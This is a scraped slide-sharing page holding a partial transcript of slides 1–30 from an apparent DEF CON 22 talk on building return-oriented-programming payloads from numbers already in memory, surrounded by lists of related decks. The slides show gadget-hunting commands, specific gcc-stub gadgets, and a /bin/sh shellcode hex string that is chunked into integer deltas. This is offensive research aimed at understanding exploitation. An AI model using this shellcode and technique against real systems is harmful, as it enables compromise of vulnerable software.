Encuestas agropecuarias integradas (AGRIS)Encuestas agropecuarias integradas (AGRIS)
Encuestas agropecuarias integradas (AGRIS)FAO
 
20161208國土計畫與農地農用
20161208國土計畫與農地農用20161208國土計畫與農地農用
20161208國土計畫與農地農用cettw
 
「個人資料去識別化」驗證標準規範研訂及推廣
「個人資料去識別化」驗證標準規範研訂及推廣「個人資料去識別化」驗證標準規範研訂及推廣
「個人資料去識別化」驗證標準規範研訂及推廣vTaiwan.tw
 

En vedette (19)

So we don't go foe hoin ass to tryin play checc up.pt.2.doc
So we don't go foe hoin ass to tryin play checc up.pt.2.docSo we don't go foe hoin ass to tryin play checc up.pt.2.doc
So we don't go foe hoin ass to tryin play checc up.pt.2.doc
 
ZstudioZ
ZstudioZZstudioZ
ZstudioZ
 
药食同源2
药食同源2药食同源2
药食同源2
 
crtical points for customizing Joomla templates
crtical points for customizing Joomla templatescrtical points for customizing Joomla templates
crtical points for customizing Joomla templates
 
20150410 呂家華 01.主持工具箱(一)
20150410 呂家華 01.主持工具箱(一)20150410 呂家華 01.主持工具箱(一)
20150410 呂家華 01.主持工具箱(一)
 
國發會2
國發會2國發會2
國發會2
 
HTTPS Överallt
HTTPS ÖveralltHTTPS Överallt
HTTPS Överallt
 
6/25 案例分析 - 小結
6/25 案例分析 - 小結6/25 案例分析 - 小結
6/25 案例分析 - 小結
 
CyberLab CCEH Session - 18 Cryptography
CyberLab CCEH Session - 18 CryptographyCyberLab CCEH Session - 18 Cryptography
CyberLab CCEH Session - 18 Cryptography
 
公民憲政會議【草根論壇】主持培訓手冊
公民憲政會議【草根論壇】主持培訓手冊公民憲政會議【草根論壇】主持培訓手冊
公民憲政會議【草根論壇】主持培訓手冊
 
Consejo Comunal
Consejo Comunal Consejo Comunal
Consejo Comunal
 
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報
2016-06-28臺北市公共住宅特殊身分保障戶分配機制第一場共識會議簡報
 
CyberLab CCEH Session -13 Hacking Web Applications
CyberLab CCEH Session -13 Hacking Web ApplicationsCyberLab CCEH Session -13 Hacking Web Applications
CyberLab CCEH Session -13 Hacking Web Applications
 
1051222公民科技培力工作坊簡報
1051222公民科技培力工作坊簡報 1051222公民科技培力工作坊簡報
1051222公民科技培力工作坊簡報
 
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉
縣市區域計畫參與經驗分享【水資源參與縣市】粘麗玉
 
Caffe Latte Attack
Caffe Latte AttackCaffe Latte Attack
Caffe Latte Attack
 
Encuestas agropecuarias integradas (AGRIS)
Encuestas agropecuarias integradas (AGRIS)Encuestas agropecuarias integradas (AGRIS)
Encuestas agropecuarias integradas (AGRIS)
 
20161208國土計畫與農地農用
20161208國土計畫與農地農用20161208國土計畫與農地農用
20161208國土計畫與農地農用
 
「個人資料去識別化」驗證標準規範研訂及推廣
「個人資料去識別化」驗證標準規範研訂及推廣「個人資料去識別化」驗證標準規範研訂及推廣
「個人資料去識別化」驗證標準規範研訂及推廣
 

Similaire à Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers

08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsAlexandre Moneger
 
Возможности интерпретатора Python в NX-OS
Возможности интерпретатора Python в NX-OSВозможности интерпретатора Python в NX-OS
Возможности интерпретатора Python в NX-OSCisco Russia
 
secure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenthersecure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenthereurobsdcon
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?AFUP_Limoges
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Toolsrjsmelo
 
Build your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesBuild your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesMartin Czygan
 
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...PROIDEA
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldDevOps.com
 
Pluggable Infrastructure with CI/CD and Docker
Pluggable Infrastructure with CI/CD and DockerPluggable Infrastructure with CI/CD and Docker
Pluggable Infrastructure with CI/CD and DockerBob Killen
 
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...First Steps Developing Embedded Applications using Heterogeneous Multi-core P...
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...Toradex
 

Similaire à Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers (20)

08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
 
Возможности интерпретатора Python в NX-OS
Возможности интерпретатора Python в NX-OSВозможности интерпретатора Python в NX-OS
Возможности интерпретатора Python в NX-OS
 
secure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenthersecure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenther
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
 
Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?Comment améliorer le quotidien des Développeurs PHP ?
Comment améliorer le quotidien des Développeurs PHP ?
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Tools
 
Build your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesBuild your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resources
 
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...
[CONFidence 2016] Sławomir Kosowski - Introduction to iOS Application Securit...
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
How to Use OpenMP on Native Activity
How to Use OpenMP on Native ActivityHow to Use OpenMP on Native Activity
How to Use OpenMP on Native Activity
 
MySQL NoSQL APIs
MySQL NoSQL APIsMySQL NoSQL APIs
MySQL NoSQL APIs
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote World
 
Pluggable Infrastructure with CI/CD and Docker
Pluggable Infrastructure with CI/CD and DockerPluggable Infrastructure with CI/CD and Docker
Pluggable Infrastructure with CI/CD and Docker
 
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...First Steps Developing Embedded Applications using Heterogeneous Multi-core P...
First Steps Developing Embedded Applications using Heterogeneous Multi-core P...
 

Plus de Alexandre Moneger

Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackAlexandre Moneger
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacksAlexandre Moneger
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceAlexandre Moneger
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacksAlexandre Moneger
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old daysAlexandre Moneger
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friendAlexandre Moneger
 

Plus de Alexandre Moneger (7)

Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stackScapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stack
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
 

Dernier

UNIT4_ESD_wfffffggggggggggggith_ARM.pptx
UNIT4_ESD_wfffffggggggggggggith_ARM.pptxUNIT4_ESD_wfffffggggggggggggith_ARM.pptx
UNIT4_ESD_wfffffggggggggggggith_ARM.pptxrealme6igamerr
 
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...amrabdallah9
 
GENERAL CONDITIONS FOR CONTRACTS OF CIVIL ENGINEERING WORKS
GENERAL CONDITIONS  FOR  CONTRACTS OF CIVIL ENGINEERING WORKS GENERAL CONDITIONS  FOR  CONTRACTS OF CIVIL ENGINEERING WORKS
GENERAL CONDITIONS FOR CONTRACTS OF CIVIL ENGINEERING WORKS Bahzad5
 
Transforming Process Safety Management: Challenges, Benefits, and Transition ...
Transforming Process Safety Management: Challenges, Benefits, and Transition ...Transforming Process Safety Management: Challenges, Benefits, and Transition ...
Transforming Process Safety Management: Challenges, Benefits, and Transition ...soginsider
 
Basic Principle of Electrochemical Sensor
Basic Principle of  Electrochemical SensorBasic Principle of  Electrochemical Sensor
Basic Principle of Electrochemical SensorTanvir Moin
 
nvidia AI-gtc 2024 partial slide deck.pptx
nvidia AI-gtc 2024 partial slide deck.pptxnvidia AI-gtc 2024 partial slide deck.pptx
nvidia AI-gtc 2024 partial slide deck.pptxjasonsedano2
 
Design of Clutches and Brakes in Design of Machine Elements.pptx
Design of Clutches and Brakes in Design of Machine Elements.pptxDesign of Clutches and Brakes in Design of Machine Elements.pptx
Design of Clutches and Brakes in Design of Machine Elements.pptxYogeshKumarKJMIT
 
Dev.bg DevOps March 2024 Monitoring & Logging
Dev.bg DevOps March 2024 Monitoring & LoggingDev.bg DevOps March 2024 Monitoring & Logging
Dev.bg DevOps March 2024 Monitoring & LoggingMarian Marinov
 
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Bahzad5
 
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...Amil baba
 
Test of Significance of Large Samples for Mean = µ.pptx
Test of Significance of Large Samples for Mean = µ.pptxTest of Significance of Large Samples for Mean = µ.pptx
Test of Significance of Large Samples for Mean = µ.pptxHome
 
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptx
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptxVertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptx
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptxLMW Machine Tool Division
 
Power System electrical and electronics .pptx
Power System electrical and electronics .pptxPower System electrical and electronics .pptx
Power System electrical and electronics .pptxMUKULKUMAR210
 
Modelling Guide for Timber Structures - FPInnovations
Modelling Guide for Timber Structures - FPInnovationsModelling Guide for Timber Structures - FPInnovations
Modelling Guide for Timber Structures - FPInnovationsYusuf Yıldız
 
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdf
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdfSummer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdf
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdfNaveenVerma126
 
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...Amil baba
 

Dernier (20)

UNIT4_ESD_wfffffggggggggggggith_ARM.pptx
UNIT4_ESD_wfffffggggggggggggith_ARM.pptxUNIT4_ESD_wfffffggggggggggggith_ARM.pptx
UNIT4_ESD_wfffffggggggggggggith_ARM.pptx
 
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
 
GENERAL CONDITIONS FOR CONTRACTS OF CIVIL ENGINEERING WORKS
GENERAL CONDITIONS  FOR  CONTRACTS OF CIVIL ENGINEERING WORKS GENERAL CONDITIONS  FOR  CONTRACTS OF CIVIL ENGINEERING WORKS
GENERAL CONDITIONS FOR CONTRACTS OF CIVIL ENGINEERING WORKS
 
Transforming Process Safety Management: Challenges, Benefits, and Transition ...
Transforming Process Safety Management: Challenges, Benefits, and Transition ...Transforming Process Safety Management: Challenges, Benefits, and Transition ...
Transforming Process Safety Management: Challenges, Benefits, and Transition ...
 
Basic Principle of Electrochemical Sensor
Basic Principle of  Electrochemical SensorBasic Principle of  Electrochemical Sensor
Basic Principle of Electrochemical Sensor
 
Lecture 4 .pdf
Lecture 4                              .pdfLecture 4                              .pdf
Lecture 4 .pdf
 
nvidia AI-gtc 2024 partial slide deck.pptx
nvidia AI-gtc 2024 partial slide deck.pptxnvidia AI-gtc 2024 partial slide deck.pptx
nvidia AI-gtc 2024 partial slide deck.pptx
 
Design of Clutches and Brakes in Design of Machine Elements.pptx
Design of Clutches and Brakes in Design of Machine Elements.pptxDesign of Clutches and Brakes in Design of Machine Elements.pptx
Design of Clutches and Brakes in Design of Machine Elements.pptx
 
Dev.bg DevOps March 2024 Monitoring & Logging
Dev.bg DevOps March 2024 Monitoring & LoggingDev.bg DevOps March 2024 Monitoring & Logging
Dev.bg DevOps March 2024 Monitoring & Logging
 
Présentation IIRB 2024 Marine Cordonnier.pdf
Présentation IIRB 2024 Marine Cordonnier.pdfPrésentation IIRB 2024 Marine Cordonnier.pdf
Présentation IIRB 2024 Marine Cordonnier.pdf
 
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)
 
Lecture 2 .pptx
Lecture 2                            .pptxLecture 2                            .pptx
Lecture 2 .pptx
 
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...
Best-NO1 Best Rohani Amil In Lahore Kala Ilam In Lahore Kala Jadu Amil In Lah...
 
Test of Significance of Large Samples for Mean = µ.pptx
Test of Significance of Large Samples for Mean = µ.pptxTest of Significance of Large Samples for Mean = µ.pptx
Test of Significance of Large Samples for Mean = µ.pptx
 
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptx
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptxVertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptx
Vertical- Machining - Center - VMC -LMW-Machine-Tool-Division.pptx
 
Power System electrical and electronics .pptx
Power System electrical and electronics .pptxPower System electrical and electronics .pptx
Power System electrical and electronics .pptx
 
Modelling Guide for Timber Structures - FPInnovations
Modelling Guide for Timber Structures - FPInnovationsModelling Guide for Timber Structures - FPInnovations
Modelling Guide for Timber Structures - FPInnovations
 
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdf
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdfSummer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdf
Summer training report on BUILDING CONSTRUCTION for DIPLOMA Students.pdf
 
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...
Popular-NO1 Kala Jadu Expert Specialist In Germany Kala Jadu Expert Specialis...
 
計劃趕得上變化
計劃趕得上變化計劃趕得上變化
計劃趕得上變化
 

Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers

  • 1. Stitching numbers Generating ROP payloads from in memory numbers Alex Moneger Security Engineer 10th of August 2014
  • 2. Who am I?  Work for Cisco Systems  Security engineer in the Cloud Web Security Business Unit (big cloud based security proxy)  Interested mostly in bits and bytes  Disclaimer: research… own time… my opinions… not my employers © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  • 3. Agenda 1. Brief ROP overview 2. Automating ROP payload generation 3. Number Stitching 1. Goal 2. Finding gadgets 3. Coin change problem 4. Pros, Cons, Tooling 5. Future Work © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
  • 4. Introduction © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
  • 5. TL;DR  Use only gadgets generated by libc or compiler stubs. In short, target the libc or compiler gadgets instead of the binary ones  Generate payloads using numbers found in memory  Solve the coin change problem to automatically generate ROP payloads  Automate the payload generation © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
  • 6. ROP overview © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
  • 7. Principle  Re-use instructions from the vulnerable binary  Control flow using the stack pointer  Multi-staged: 1. Build the payload in memory using gadgets 2. Transfer execution to generated payload  Only way around today’s OS protections (let aside home routers, embedded systems, IoT, …) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
  • 8. Finding instructions  Useful instructions => gadgets  Disassemble backwards from “ret” instruction  Good tools available  Number of gadgets to use is dependent upon target binary © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
  • 9. Transfer control to payload  Once payload is built in memory  Transfer control by “pivoting” the stack  Allows to redirect execution to a stack crafted by the attacker  Useful gadgets:  leave; ret  mv esp, addr; ret  add esp, value; ret © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
  • 10. Automating payload generation © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
  • 11. Classic approach  Find required bytes in memory  Copy them to a controlled stack  Use either:  A mov gadget (1, 2 or 4 bytes)  A copy function if available (strcpy, memcpy, …) (variable byte length) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
  • 12. Potential problems  Availability of a mov gadget  Can require some GOT dereferencing  Availability of some bytes in memory  May require some manual work to get the missing bytes © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
  • 13. Finding bytes  Shellcode requires “sh” (x73x68) someone@something:~/somewhere$ sc="x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcd x80” someone@something:~/somewhere$ ROPgadget abinary -opcode "x73x68" Gadgets information ============================================================ 0x08048321: "x73x68” someone@something:~/somewhere$ hexdump -C abinary.text| egrep --color "73(s)*68" 00000320 75 73 68 00 65 78 69 74 00 73 74 72 6e 63 6d 70 |ush.exit.strncmp|  Got it! What about “h/” (x68x2f)? someone@something:~/somewhere$ hexdump -C hbinary5-mem.txt | egrep --color "68(s)*2f" someone@something:~/somewhere$ © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
  • 14. mov gadget  Very small binaries do not tend to have many mov gadgets  In the case of pop reg1; mov [ reg2 ], reg1:  Null byte can require manual work © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
  • 15. Number stitching © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15
  • 16. Initial problem  Is exploiting a “hello world” type vulnerability possible with:  RELRO  X^W  ASLR  Can the ROP payload be built only from libc/compiler introduced stubs?  In other words, is it possible not to use any gadgets from the target binary code to build a payload? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 16
  • 17. Program anatomy © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 17
  • 18. Libc static functions  What other code surrounds the “hello world” code? someone@something:~/somewhere$ pygmentize abinary.c #include <stdio.h> int main(int argc, char **argv, char** envp) { printf("Hello Defcon!!n"); }  Does libc add anything at link time? someone@something:~/somewhere$ objdump -d -j .text -M intel abinary| egrep '<(.*)>:' 08048510 <_start>: 080489bd <main>: 080489f0 <__libc_csu_fini>: 08048a00 <__libc_csu_init>: 08048a5a <__i686.get_pc_thunk.bx>: © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 18
  • 19. Where does this come from?  At link time “libc.so” is used  That’s a script which both dynamically and statically links libc: someone@something:~/somewhere$ cat libc.so /* GNU ld script Use the shared library, but some functions are only in the static library, so try that secondarily. */ OUTPUT_FORMAT(elf32-i386) GROUP ( /lib/i386-linux-gnu/libc.so.6 /usr/lib/i386-linux-gnu/libc_nonshared.a AS_NEEDED ( /lib/i386- linux-gnu/ld-linux.so.2 ) )  Looks libc_nonshared.a statically links some functions: © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 19
  • 20. What is statically linked?  Quite a few functions are: someone@something:~/somewhere$ objdump -d -j .text -M intel /usr/lib/i386-linux-gnu/libc_nonshared.a | egrep '<*>:' 00000000 <__libc_csu_fini>: 00000010 <__libc_csu_init>: 00000000 <atexit>: 00000000 <at_quick_exit>: 00000000 <__stat>: 00000000 <__fstat>: 00000000 <__lstat>: 00000000 <stat64>: 00000000 <fstat64>: 00000000 <lstat64>: 00000000 <fstatat>: 00000000 <fstatat64>: 00000000 <__mknod>: 00000000 <mknodat>: 00000000 <__warn_memset_zero_len>: 00000000 <__stack_chk_fail_local>: © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 20
  • 21. Gadgets in static functions  Those functions are not always included  Depend on compile options (-fstack-protector, …)  I looked for gadgets in them.  Fail… © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 21
  • 22. Anything else added?  Is there anything else added which is constant:  get_pc_thunk.bx() used for PIE, allows access to GOT  _start() is the “real” entry point of the program  There are also a few “anonymous” functions (no symbols) introduced by gcc.  Those functions relate to profiling © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 22
  • 23. Static linking  Profiling is surprisingly on by default on some distros. To check default compiling options: cc –Q –v.  Look for anything statically linking  This work was done on gcc 4.4.5  Looking for gadgets in that, yields some results! © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 23
  • 24. Useful gadgets against gcc 4.4.5  What I get to work with: 1. Control of ebx in an profiling function: pop ebx ; pop ebp ;; 2. Stack pivoting in profiling function: leave ;; 3. Write to mem in profiling function: add [ebx+0x5d5b04c4] eax ;; 4. Write to reg in profiling function: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;  In short, attacker controls:  ebx  That’s it…  Can anything be done to control the value in eax? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 24
  • 25. Shellcode to numbers © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 25
  • 26. Accumulating  Useful gadget: add eax [ebx-0xb8a0008] ; (removed trailing junk)  We control ebx, so we can add arbitrary memory with eax  Is it useful?  Yes, let’s come back to this later © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 26
  • 27. Dumping  Useful gadget: add [ebx+0x5d5b04c4] eax ;;  Ebx is under attacker control  For the time being, assume we control eax  Gadget allows to add a value from a register to memory  If attacker controls eax in someway, this allows to write anywhere  Use this in order to dump a value to a custom stack © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 27
  • 28. Approach  Choose a spot in memory to build a stack:  .data section is nice  must be a code cave (mem spot with null bytes), since we are performing add operations  Choose a shellcode to write to the stack:  As an example, use a setreuid shellcode  Nothing unusual in all this © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 28
  • 29. Chopping shellcode 1. Next, cut the shellcode into 4 byte chunks 2. Interpret each chunk as an integer 3. Keep track of the index of each chunk position 4. Order them from smallest to biggest 5. Compute the difference between chunks 6. There is now a set of monotonically increasing values representing the shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 29
  • 30. Visual chopping 1 2 3 x0dx0cx0bx0a x08x07x06x05 x04x03x02x01 0x01020304 0x05060708 0x0a0b0c0d 3 2 1 0x05060708 – 0x01020304 2 0x0a0b0c0d – 0x05060708 1 0x01020304 0x04040404 0x05050505 3 2 1 Shellcode Chunks Deltas Monotonically increasing © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 30
